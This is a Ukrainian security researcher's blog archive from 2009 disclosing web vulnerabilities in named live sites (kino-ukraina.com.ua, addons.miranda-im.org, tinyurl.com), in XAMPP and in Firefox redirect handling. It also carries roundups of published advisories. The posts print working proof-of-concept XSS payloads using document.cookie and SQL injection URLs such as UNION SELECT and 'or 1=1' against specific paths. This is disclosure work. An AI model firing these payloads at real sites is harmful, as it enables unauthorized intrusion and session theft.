Архів для категорії 'Уразливості'

Уразливості на addons.miranda-im.org

23:57 04.08.2009

У грудні, 13.12.2008, я знайшов Cross-Site Scripting уразливості на проекті http://addons.miranda-im.org. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на addons.miranda-im.org.

XSS:

POST запит на сторінці http://addons.miranda-im.org/login.php в полі Username. Зараз ця уразливість вже виправлена (через зміни в роботі форми логіна).

POST запит на сторінці http://addons.miranda-im.org/login.php ?action=lostpwd

"><script>alert(document.cookie)</script>В поліях: Username та E-mail.

Уразливості на www.kino-ukraina.com.ua

19:22 04.08.2009

07.05.2009

У серпні, 19.08.2008, я знайшов SQL Injection уразливість, а сьогодні ще нові SQL Injection та Cross-Site Scripting уразливості на сайті http://www.kino-ukraina.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на kino-ukraina.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.08.2009

SQL Injection:

http://www.kino-ukraina.com.ua/?id=-1%27%20or%201=1/*

Вже виправлена в результаті змін на сайті.

http://www.kino-ukraina.com.ua/showwait.php?wait_id=84%20and%20version()=5

http://www.kino-ukraina.com.ua/showwait.php?wait_id=-1%20union%20select%200,0,version(),0%23

http://www.kino-ukraina.com.ua/showfilm.php?film_id=88%20and%20version()=5

http://www.kino-ukraina.com.ua/showopen.php?opening_id=53%20and%20version()=5

XSS:

Більшість з уразливостей так досі й не виправлені.

Добірка уразливостей

16:11 03.08.2009

В даній добірці уразливості в веб додатках:

  • Aztech ADSL2/2+ 4 Port default password (деталі)
  • New slash packages fix multiple vulnerabilities (деталі)
  • Plesk 8.6.0 authentication flaw allows to gain virtual user priviledges (деталі)
  • Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101 (деталі)
  • Sea-Surfing on the Motorola Surfboard (деталі)
  • TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload (деталі)
  • BizDirectory <== 2.04 Cross-Site Scripting Vulnerabilities (деталі)
  • CS-Cart <= 1.3.5 SQL Injection (деталі)
  • Blue Coat K9 Web Protection Response Handling Buffer Overflows (деталі)
  • Blue Coat K9 Web Protection “Referer” Header Buffer Overflow (деталі)

Нові уразливості в XAMPP

19:38 01.08.2009

25.06.2009

У червні, 23.06.2009, я знайшов Cross-Site Scripting, Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

01.08.2009

XSS:

http://site/xampp/ming.php?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

CSRF:

http://site/xampp/phonebook.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

XSS (persistent):

http://site/xampp/phonebook.php?lastname=%3Cscript%3Ealert(document.cookie)%3C/script%3E&firstname=1

http://site/xampp/phonebook.php?firstname=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/xampp/phonebook.php?firstname=1&phone=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL Injection:

http://site/xampp/phonebook.php?action=del&id=-1%20or%201=1

http://site/xampp/phonebook.php?lastname=',sqlite_version())/*&firstname=1 (mq off)

http://site/xampp/phonebook.php?firstname=',sqlite_version(),1)/* (mq off)

http://site/xampp/phonebook.php?firstname=1&phone='),(sqlite_version(),1,'1 (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Full path disclosure:

http://site/xampp/phonebook.php?lastname=’&firstname=1

http://site/xampp/phonebook.php?firstname=’

http://site/xampp/phonebook.php?firstname=1&phone=’

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

Добірка уразливостей

16:12 31.07.2009

В даній добірці уразливості в веб додатках:

  • Directory traversal in LANDesk Management Suite 8.80.1.1 (деталі)
  • Webwasher Denial of Service Vulnerability (деталі)
  • Multiple Vulnerabilities in AWStats Totals (деталі)
  • ZoneMinder Multiple Vulnerabilities (деталі)
  • Mini-NUKE v2.3 Freehost (tr) Multiple Remote SQL Injection Vulnerabilities (деталі)
  • Crafty Syntax Live Help <= 2.14.6 SQL Injection (деталі)
  • Secunia Research: Calendarix Basic Two SQL Injection Vulnerabilities (деталі)
  • Multiple Local File Include Vulnerabilities in Pluck CMS 4.5.2 (деталі)
  • Multiple Local File Include Vulnerabilities in ezContents CMS 2.0.3 (деталі)
  • Security Bypass Vulnerabilities AXESSTEL (деталі)

Cross-Site Scripting уразливості в Mozilla та Firefox

23:56 30.07.2009

В липні, 02.07.2009, я виявив Cross-Site Scripting уразливості в Mozilla та Firefox.

Які дозволяють обійти заборону на виконання JavaScript коду в location-header редиректорах (при редирекції на javascript: URI). Про XSS атаку через refresh-header редиректори в різних браузерах я писав в записі про Cross-Site Scripting уразливості в Mozilla, Internet Explorer, Opera та Chrome.

В Mozilla та Firefox на ASP сайтах (чи інших сайтах, що використовують відповідь “302 Object moved”), при запиті до location-header редиректора з вказанням JavaScript коду, браузер виводить сторінку “Object Moved”, де в лінці “here” виводить даний код. При натисканні на яку код спрацює. Тобто це Strictly social XSS.

XSS:

При запиті до скрипта на сайті:
http://site/script.php?param=javascript:alert(document.cookie)
Що поверне у відповіді заголовок Location:
HTTP/1.x 302 Object moved
Location: javascript:alert%28document.cookie%29

Браузер виводить сторінку “Object Moved”. При кліку по лінці “here” код спрацює в контексті даного сайту.

Робочі приклади ASP-редиректорів.

XSS:

На сервері Microsoft IIS 6.0:

На сервері nginx 0.6.35:

Окрім javascript URI, також можна використати data URI для виконання JS-коду, якщо редиректор виводить в заголовку Location символи “;” і “,” у чистому (не в URL encoding) вигляді.

Уразливі Mozilla 1.7.x та попередні версії.

Уразливі Mozilla Firefox 3.0.12 (і 3.5.x також повинні бути уразливими) та попередні версії.

Також уразливі браузери: SeaMonkey 1.1.17, Firefox 3.6 a1 pre, Firefox 3.7 a1 pre, Orca Browser 1.2 build 5 та Maxthon 3 Alpha (3.0.0.145) з Ultramode. А також браузери Firefox 3.0.19, Firefox 3.5.11, Firefox 3.6.8, Firefox 4.0b2 та Opera 10.53 (при цьому версія Opera 9.52 невразлива).

[Оновлення: 04.08.2010]

Додав інформацію про використання data URI для виконання JS-коду в location-header редиректорах з відповіддю “302 Object moved”. Подібно до редиректорів з відповіддю “302 Found”.

[Оновлення: 07.08.2010]

Додав інформацію про інші уразливі браузери.

[Оновлення: 16.09.2012]

Як я виявив, у версіях Firefox 10.0.7 і Firefox 15.0.1 дана уразливість більше не працює - вона була приховано виправлена Mozilla в Firefox 9.0.

Добірка уразливостей

16:29 29.07.2009

В даній добірці уразливості в веб додатках:

  • Leopard Server Remote Path Traversal (Wiki Server from Mac OS X) (деталі)
  • SunShop <= 4.1.4 SQL Injection (деталі)
  • Vanilla <= 1.1.4 Script Injection / XSS (деталі)
  • Ovidentia 6.6.5 XSS (index.php) (деталі)
  • Directory traversal in 2X ThinClientServer v5.0_sp1-r3497 (деталі)
  • vBulletin Cross Site Scripting Vulnerability (деталі)
  • Null Byte Local file Inclusion in FAR - PHP Project version 1.0 (деталі)
  • Evolution Vulnerability (деталі)
  • OneNews Beta 2 Multiple Vulnerabilities (деталі)
  • WESPA Calendario v1.1 Sql Injection Vulnerability (деталі)

Уразливості на tinyurl.com

23:54 28.07.2009

Сьогодні я знайшов Cross-Site Scripting уразливості на проекті http://tinyurl.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на tinyurl.com.

XSS:

Дана XSS працює в браузерах Firefox та Opera, в зв’язку з Cross-Site Scripting уразливостями в Firefox та Opera. В даних браузерах можливе виконання JavaScript коду в location-header редиректорі на tinyurl.com (як й інших location-header редиректорах в Мережі). Що може бути викиростане для розповсюдження malware через даний сервіс редирекції.

Дана атака не дозволяє дістатися до кукісів. Для цього можна використати іншу XSS (через сервіс превью на preview.tinyurl.com), що дозволяє дістатися до кукісів та DOM.

XSS (Mozilla / Firefox / Opera / Chrome):

Це Strictly social XSS про яку я вже писав раніше.

Сервіс превью також доступний на домені tinyurl.com.

XSS (Mozilla / Firefox / Opera / Chrome):

Це також Strictly social XSS.

Уразливості в XAMPP

20:23 28.07.2009

23.06.2009

Сьогодні я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

28.07.2009

XSS:

http://site/xampp/iart.php?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Insufficient Anti-automation:

http://site/xampp/mailform.php

При доступі в адмінку та якщо включений SMTP Service (Mercury Mail) можна відправляти спам в зв’язку з відсутністю захисту від автоматизованих запитів.

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

Добірка уразливостей

17:31 27.07.2009

В даній добірці уразливості в веб додатках: